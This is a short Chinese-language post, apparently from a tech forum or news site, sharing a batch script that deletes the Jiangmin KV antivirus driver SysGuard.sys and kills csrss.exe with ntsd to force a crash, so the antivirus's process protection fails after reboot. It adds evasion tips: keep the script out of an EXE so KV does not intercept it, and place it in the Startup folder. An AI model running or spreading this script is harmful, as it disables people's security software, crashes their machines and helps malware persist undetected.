很XX，高手飄過...

今早起來一邊早飯一邊試驗的。代碼見下：

@echo off
del %systemroot%\system32\drivers\SysGuard.sys /f /q /s
set app_name=csrss.exe
echo 查找進程%app_name%,準備死機...
(tasklist /nh | findstr /i %app_name%) || (goto dead)
:dead
ntsd -c -q -pn %app_name%

原理我自己也不是太明白就不多說了，實驗結(jié)果好像管用，我用虛擬機和真實機都分別試驗了下，還不錯。直接點的批處理腳本，如果轉(zhuǎn)成EXE效果不保證了(沒有實驗)。但是由于有關機回寫，必須強迫死機，雖然重啟后KV的變態(tài)進程守護不管用了(可以用任務管理器試試)，但是在重啟之前你還得把善后工作做好，準備來日重生。有幾點得注意：

1、不能直接用批處理寫注冊表(雖然可以還原SSDT之后用API寫，但是不是我們追求的純粹R3手段)
2、最好不要把bat放在EXE里，因為運行時KV十有八九可以攔截到
3、最好的地方可能是啟動文件夾，或許還有些其他修改手段

的確是個很娛樂且沒有什么實用價值的手段...大家可以娛樂下，不過考慮到每個人的機子效果或許不同，不用報有太大希望。

特別強調(diào)：KV08/09用戶，試驗時一定要把C:\Windows\system32\drivers\SysGuard.sys拷貝個到其它地方備份，如果本實驗真的成功了，KV就實效了。只有拷貝回去下次重啟即可恢復，或者重新安裝。

【編輯推薦】

1. 《X戰(zhàn)警前傳》提前泄露 FBI怒抄0day組織大本營
2. 徹底無處可逃：研究人員展示BIOS級底層安全攻擊
3. 美女黑客曝英特爾CPU漏洞或引發(fā)全球用戶恐慌
4. 安全專家詳談：對付惡意軟件的策略及方法
5. 51CTO記者親歷：尤金.卡巴斯基開啟2009中國安全行